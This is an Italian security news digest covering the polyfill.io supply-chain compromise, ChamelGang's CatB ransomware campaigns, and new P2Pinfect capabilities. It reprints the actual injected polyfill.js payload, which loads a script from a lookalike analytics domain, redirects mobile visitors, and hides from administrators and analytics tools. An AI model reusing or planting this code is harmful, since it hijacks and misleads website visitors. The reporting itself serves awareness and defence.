Un attacco alla supply chain ha colpito il popolare script polyfill.js, utilizzato da oltre 100.000 siti web per supportare browser più vecchi. Questo attacco ha compromesso il dominio e l’account GitHub di polyfill.io, iniettando malware nei siti che utilizzano questa libreria, colpendo utenti di alto profilo come JSTOR, Intuit e il World Economic Forum.

Dettagli dell’Attacco

Nel febbraio di quest’anno, una compagnia cinese ha acquistato il dominio cdn.polyfill.io e l’account GitHub associato. Da allora, il dominio è stato utilizzato per distribuire malware sui dispositivi mobili attraverso qualsiasi sito che integra cdn.polyfill.io. Gli utenti mobili venivano reindirizzati a un sito di scommesse sportive tramite un falso dominio di Google Analytics (www.googie-anaiytics.com).

Meccanismo dell’Attacco

Il codice di polyfill.js è stato alterato per generare dinamicamente script malevoli basati sugli header HTTP, attivandosi su dispositivi mobili specifici a determinate ore e ignorando gli utenti amministratori o quelli monitorati da servizi di analisi web.

Esempio di Payload Malevolo

javascriptCopia codicefunction isPc() {
  try {
    var _isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
      _isMac = navigator.platform == "Mac68K" || navigator.platform == "MacPPC" ||
      navigator.platform == "Macintosh" || navigator.platform == "MacIntel";
    return _isMac || _isWin;
  } catch (_0x44e1f6) {
    return false;
  }
}
function vfed_update(_0x5ae1f8) {
  _0x5ae1f8 !== "" &&
    loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {
      if (usercache == true) {
        window.location.href = _0x5ae1f8;
      }
    });
}
function check_tiaozhuan() {
  var _isMobile = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
  if (_isMobile) {
    var _curHost = window.location.host,
      _ref = document.referrer,
      _redirectURL = "",
      _kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
      _rnd = Math.floor(Math.random() * 100 + 1),
      _date = new Date(),
      _hours = _date.getHours();
    if (_curHost.indexOf("www.dxtv1.com") !== -1 || _curHost.indexOf("www.ys752.com") !== -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_curHost.indexOf("shuanshu.com.com") !== -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_hours >= 0 && _hours < 2 && _rnd <= 10) {
      _redirectURL = _kuurzaBitGet;
    } else if (_hours >= 2 && _hours < 4 && _rnd <= 15) {
      _redirectURL = _kuurzaBitGet;
    } else if (_hours >= 4 && _hours < 7 && _rnd <= 20) {
      _redirectURL = _kuurzaBitGet;
    } else if (_hours >= 7 && _hours < 8 && _rnd <= 10) {
      _redirectURL = _kuurzaBitGet;
    } else if (_rnd <= 10) {
      _redirectURL = _kuurzaBitGet;
    }
    if (_redirectURL != "" && !isPc() && document.cookie.indexOf("admin_id") == -1 && document.cookie.indexOf("adminlevels") == -1) {
      vfed_update(_redirectURL);
    }
  }
}
let _outerPage = document.documentElement.outerHTML,
  bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
  wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
  aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
  aplausix = _outerPage.indexOf(".plausible.io") != -1,
  statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
  ? setTimeout(check_tiaozhuan, 2000)
  : check_tiaozhuan();

Alternative Sicure e Consigli

L’autore originale di Polyfill raccomanda di non utilizzare più Polyfill, poiché i browser moderni non ne hanno bisogno. Tuttavia, se è ancora necessario, sia Fastly che Cloudflare offrono alternative sicure.

Questo incidente evidenzia l’importanza di monitorare attentamente le dipendenze del software e utilizzare servizi di scansione e monitoraggio, come quelli offerti da Sansec, per proteggere le infrastrutture web dagli attacchi alla supply chain.

ChamelGang, un gruppo APT sospettato di essere cinese, ha condotto numerosi attacchi informatici utilizzando ransomware come strumento finale per ottenere guadagni finanziari, causare disservizi, distrarre e rimuovere prove. Questi attacchi hanno preso di mira infrastrutture critiche e istituzioni governative in vari paesi.

Attività di ChamelGang

Tra il 2021 e il 2023, ChamelGang ha attaccato settori critici, inclusi istituzioni sanitarie in India e l’ufficio della Presidenza del Brasile nel 2022, utilizzando il ransomware CatB. L’attribuzione di questi attacchi non è stata rilasciata pubblicamente. Inoltre, il gruppo ha preso di mira un’organizzazione governativa in Asia orientale e un’organizzazione aeronautica nel subcontinente indiano.

Strumenti e Tecniche

ChamelGang utilizza strumenti pubblicamente disponibili e malware personalizzati come BeaconLoader. L’uso di CatB ransomware è associato a ChamelGang grazie a sovrapposizioni nel codice, meccanismi di staging e artefatti di malware come certificati, stringhe e icone.

BestCrypt e BitLocker

Inoltre, sono stati osservati attacchi con BestCrypt e BitLocker per criptare endpoint e chiedere riscatti. Questi strumenti, legittimamente usati per la protezione dei dati, sono stati abusati per scopi malevoli, colpendo vari settori in Nord America, Sud America ed Europa, con il settore manifatturiero americano maggiormente colpito.

Implicazioni della Cyber Espionage

L’uso strategico del ransomware da parte di attori della cyberespionage sfuma le linee tra cybercriminalità e spionaggio, complicando l’attribuzione e la risposta agli attacchi. La collaborazione continua tra forze dell’ordine e agenzie di intelligence è cruciale per migliorare la condivisione delle informazioni e la consapevolezza situazionale.

La ricerca sottolinea l’importanza di un’analisi dettagliata degli artefatti osservati e del contesto più ampio degli incidenti di ransomware. SentinelLabs, autore della ricerca, è interessato nel seguire il gruppo per trovare nuovi riscontri.

P2Pinfect è un malware basato su Rust, analizzato a fondo da Cado Security. Questo malware utilizza una botnet peer-to-peer (P2P) per il suo meccanismo di comando e controllo. Inizialmente, P2Pinfect sembrava essere in gran parte dormiente, diffondendosi principalmente attraverso Redis e un limitato spreader SSH. Tuttavia, recentemente, è stato aggiornato per includere payload di ransomware e cryptominer.

P2Pinfect è stato scoperto per la prima volta da Cado Security durante l’analisi della telemetria di honeypot nel luglio 2023. La campagna è iniziata il 23 giugno, basandosi sul certificato TLS utilizzato per le comunicazioni C2.

Accesso Iniziale

Il malware si diffonde sfruttando le funzionalità di replica in Redis. Utilizza il comando SLAVEOF per trasformare i nodi Redis scoperti in follower del server dell’attaccante. Una volta completato, l’attaccante può inviare comandi arbitrari ai nodi follower.

P2Pinfect sfrutta anche un altro vettore di accesso iniziale in Redis, abusando dei comandi di configurazione per scrivere un cron job nella directory cron.

Payload Principale

P2Pinfect è un worm, quindi tutte le macchine infette scansionano internet per trovare altri server da infettare. Dispone di un semplice password sprayer SSH, ma ha un tasso di successo inferiore rispetto a Redis. Dopo l’infezione, il malware aggiunge una chiave SSH nel file autorizzato dell’utente corrente e limita l’accesso a Redis agli IP delle connessioni esistenti.

La botnet P2Pinfect forma una grande rete mesh, permettendo al malware di propagare aggiornamenti binari attraverso il meccanismo di gossip.

Nuovi payload

Ransomware

Una volta che un nuovo peer si unisce alla botnet, P2Pinfect riceve un comando per scaricare ed eseguire un nuovo payload ransomware chiamato “rsagen”. Questo payload esegue la crittografia dei file e aggiunge una nota di riscatto.

Cryptominer

Il malware include anche un miner Monero, attivato circa cinque minuti dopo l’avvio del payload principale. Il miner è preconfigurato con il wallet Monero e il pool di mining.

Rootkit in User Mode

P2Pinfect ora include un rootkit in user mode, che modifica i file .bashrc per caricare un file libs.so.1. Questo file hijacka le chiamate a fopen, open, lstat, unlink e readdir per nascondere specifiche informazioni di processo.

P2Pinfect è un malware altamente sofisticato che continua a evolversi, aggiungendo nuove funzionalità per massimizzare i profitti degli attaccanti. Le recenti aggiunte di ransomware, cryptominer e rootkit dimostrano gli sforzi continui degli autori del malware per sfruttare l’accesso illecito e diffondere ulteriormente la rete.